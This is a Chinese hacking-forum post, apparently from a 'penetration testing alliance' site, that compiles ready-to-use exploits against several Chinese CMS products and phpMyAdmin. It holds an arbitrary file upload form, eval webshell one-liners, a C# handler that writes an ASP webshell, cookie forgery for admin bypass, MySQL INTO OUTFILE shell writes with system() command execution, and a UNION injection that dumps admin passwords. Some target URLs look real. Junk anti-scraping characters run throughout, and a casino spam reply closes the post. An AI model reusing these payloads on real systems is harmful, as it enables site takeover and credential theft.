---------------------------------------------------------------------------------------------------------------------------------------------------------------------------( c- U- D/ N: l5 L+ p7 g  y. V9 V

: s% H9 g7 w# h; t$ g5 rYxShop易想购物商城4.7.1版本任意文件上传漏洞
0 I: r; [: y6 n' S1 J
7 U/ o9 {4 M$ Xhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
3 ]; |1 G% q4 q8 j5 t跳转到网站根目录上传任意文件。  r% S! o- H2 f2 J  {
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
% w. L- V5 B" R2 j<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">0 g5 [' a$ @3 X) A) \) X2 H
Upload a new file:<br>
5 m/ Z6 m3 T, |. o4 J7 a0 t<input type="file" name="NewFile" size="50"><br>/ H( s1 y* E& W' G7 T! f9 v
<input id="btnUpload" type="submit" value="Upload">! Q4 u/ I3 N+ p
</form>, q8 D0 X6 ?  w
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ i5 F: G* R$ Z, c$ h+ x. y

# n/ i- B6 F/ ~( \) i0 P5 {! |SDcms 后台拿webshell
2 Z6 t+ W$ g" A) ]2 ^) _
2 F/ X' n  h7 }6 V第一种方法:! B5 W. T6 x2 i& f0 ?& N( L( y+ M
进入后台-->系统管理-->系统设置-->系统设置->网站名称;: L8 t' @9 p6 h1 Q; |0 r
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
/ d  a4 c! P+ O! @用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
2 H  |$ I3 B# F, V/ F第二种方法:
: B# F, i  h, Y; n8 |; q/ \进入后台-->系统管理-->系统设置-->系统设置->上传设置;
5 Z7 K6 ~) s4 W, y) U6 Q4 s5 R在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!9 r9 g1 h  Q+ ^
第三种方法:5 W1 e0 q3 ?3 D- P: n$ l/ c+ Q* L
进入后台-->界面管理-->模板文件管理-->创建文件) }9 V* f$ z  t
文件名写入getshell.ashx. m) Q8 Y9 }* x/ H
内容写入下面内容:
8 D2 U2 f6 W2 J6 i- q$ h/ a/====================复制下面的=========================/
  C, @4 @* O/ O1 a<%@ WebHandler Language="C#" Class="Handler" %>7 ^1 Z6 a/ e5 a6 m; I4 C
using System;
) R  b2 u! e  {0 W5 F4 S1 busing System.Web;  q( h. T! K# D+ O# ~
using System.IO;
: i" i1 Z* z, Z- |4 g' _public class Handler : IHttpHandler {# g" l2 F0 I, Z6 E
public void ProcessRequest (HttpContext context) {
- O  w/ N. _- o7 Acontext.Response.ContentType = "text/plain";- k* b. J' v9 s+ t3 Y2 a
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));* K( `! W/ u8 _0 o
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");+ K7 Y* v( |' B8 t5 a
file1.Flush();
% [3 p: j- R; l# _8 r" P# b. hfile1.Close();
6 z- D' f- t5 M: A7 q- m}9 ^' `, ^4 q4 m
public bool IsReusable {
' y& W8 q( A* i1 `3 @; |3 mget {4 U1 Z8 G2 k5 ~" W0 o
return false;
- @- b# j; i% J( a- ~- s5 H1 }( s- Q}) Z. J+ G5 J3 D. z9 |  j+ j- z
}
0 W2 X2 g% L$ o% D* `( [, P" L}
0 j6 _# K$ v$ z& [+ p) U/ U- b1 ~9 U/=============================================/
% r  h9 Y' l9 C5 z0 t' N+ Y访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
7 n# g9 g+ `! \8 j" \; N会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
6 s* |/ N% ?3 W0 s# M; S-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 I2 I" a% k) v& T3 q- m9 ?# v
3 g4 w* a  ~9 Y  |) q2 Y
ESCMS网站管理系统0day2 g+ Z% X, b& H# P5 m8 C( o

) R5 r1 z4 F# [( L" b+ w后台登陆验证是通过admin/check.asp实现的) o# ^! F8 p& \

( K9 w, \% h( i+ X. \; M4 T首先我们打开http://target.com/admin/es_index.html8 _, x6 D/ d( q" C& @1 Z8 N2 ^0 x
然后在COOKIE结尾加上9 w2 r/ m7 @1 h: y* D
; ESCMS$_SP2=ES_admin=st0p;0 E3 H, [! `, K9 W
修改,然后刷新
1 }9 Z+ v! q" X$ s" o5 z8 W$ j2 G进后台了嘎..
6 c5 Y% u$ f3 o& t3 p$ i9 B然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
2 G/ h! D; N- E# j, I3 X9 X6 Z( \( U/ m) g
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交." P5 ]' n) s$ a
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
6 f& W& W% d; f* n+ U6 ]存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..) c* W' R$ @8 v& H! ]
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
& {* b' l  ]; e------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" L$ J2 ]9 P8 q% R* n3 n1 X: R% m
/ ?# @" i: |2 Q( q) w宁志网站管理系统后台无验证漏洞及修复. p& d) r5 n% V/ T# ^& o
$ p2 }6 L& M3 `. }% y
网上搜了一下,好像没有发布.如有雷同纯粹巧合!2 B* P' h; R* I
官方网站:www.ningzhi.net1 p; Y! h8 N1 y* B
学校网站管理系统 V.2011版本 ' H( r) @8 P/ b7 y0 N: s( @
http://down.chinaz.com/soft/29943.htm " V, @7 J5 c  [. `
其它版本(如:政府版等),自行下载.6 s) A$ I4 d9 E
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
+ U* y; ?* e* w2 o9 s6 ~( [login.asp代码如下:
" X/ }* A4 U8 B+ }3 W( k- m- ~<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
; ^0 |- |4 O- B7 {7 `3 x6 ]manage.asp代码我就不帖出来了.反正也没验证.! R/ `: f' r; X, g7 U5 ^& R
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
. _" U. E7 k/ C3 _9 y漏洞利用:
: F( {% \5 o+ |3 O' u) f6 y; `1 c直接访问http://www.0855.tv/admin/manage.asp
0 A$ a9 A: o9 E数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
, V: s) y' A$ m; U----------------------------------------------------------------------------------------------------------------------------------------------------------------------------( c5 Q' G5 T1 _, O$ t, K6 ~( ?

  o! d" A5 w6 ~3 P8 k6 i: v8 Zphpmyadmin拿shell的四种方法总结及修复5 D6 F. l5 ^; D2 J1 O0 B

: S# F- O+ }4 r方法一:
- s: s+ ~. ^1 cCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
1 a2 E( v+ p0 C- BINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
9 @2 D. {3 @& `# e8 N8 U9 g$ PSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
. j4 ?5 @5 H9 C+ X  e7 r----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
* Q/ D6 x9 Q, J$ _% L2 ?7 ^    一句话连接密码:7on
$ L& u5 I; `3 X% b$ U方法二:" O2 I. x* [. }5 w: z6 `
读取文件内容:    select load_file('E:/xamp/www/s.php');2 x- I! u9 Q7 w, |7 P1 E
写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
8 V  i1 ?  A* m# c4 Bcmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'" W! K2 {7 R& F- J% L
方法三:$ U& T- r1 e- _" _- y+ T; W
JhackJ版本 PHPmyadmin拿shell5 _% B3 P7 M  _  f* p
Create TABLE study (cmd text NOT NULL);
; h* V+ K& v' t# Y1 L0 f; UInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
% C9 z4 A/ ]6 f( Uselect cmd from study into outfile 'E:/wamp/www/7.php';3 p9 I$ G0 V4 Y% R* V; Q& L; Y: \
Drop TABLE IF EXISTS study;5 I1 T9 X6 C8 o; Y5 l& [
<?php eval($_POST[cmd])?>0 o; f. s5 f2 q3 h5 d) [! z
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
# \4 a" C, p7 K6 W" b. JINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
' C& J4 w3 u: s/ w- LSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1( @9 g& r6 |. m8 S& i7 Z- T
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
( b) [, K: S! Z, m方法四:
5 h% c* P) s1 a- P* Tselect load_file('E:/xamp/www/study.php');
# G4 f2 P$ k& ~' d! Uselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
; v2 N: B$ f' |4 B" N6 h然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
7 e. B3 _$ h; _* \, n8 c1 F- e& G-----------------------------------------------------------------------------------------------------------------------------------------------------------------------/ ~/ ^" D! t5 j! p3 Z& N: L1 |
' C/ s# u) A2 h5 A$ |! Q8 q
NO.001中学网站管理系统 Build 110628 注入漏洞
7 E0 m6 K. d/ }% {: u8 h' q' E! z/ ~7 X3 O! ~8 ?1 i
NO.001中学网站管理系统功能模块:
+ C( _" y# p# |7 H, `1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
% |& z# \4 g6 z  e9 I- a9 @4 a% d2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息% C, i1 A/ u3 H
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息% m& O  k9 v2 q, r% B& `
4.视频图片管理:一级分类,动态添加视频或者图片等信息
( f( T% @* N' r/ X) A3 [' L5.留言管理:对留言,修改,删除、回复等管理
5 o) z+ B3 J4 i3 X! @* E7 ]6.校友频道:包括校友资料excel导出、管理等功能
% y# Z1 i& ^6 z/ j7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
& z, N4 g5 n  C, ]2 k7 f默认后台:admin/login.asp
$ N7 l) x4 G# z% V官方演示:http://demo.001cms.net
- T8 F& ]# O) Y源码下载地址:http://down.chinaz.com/soft/30187.htm
+ B. W2 K# p) W2 Q  E1 Y( T4 _+ ^EXP:3 t0 A/ c# U6 u( h* i8 o
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin* q9 m! B' }  m1 C- i! o
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin/ y, e7 h: A% i. ^3 F1 |
getshell:后台有备份,你懂的
1 w" G+ N3 B- k/ N& R另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。' J1 W* ~: i/ s" z
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者: 匿名    时间: 2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2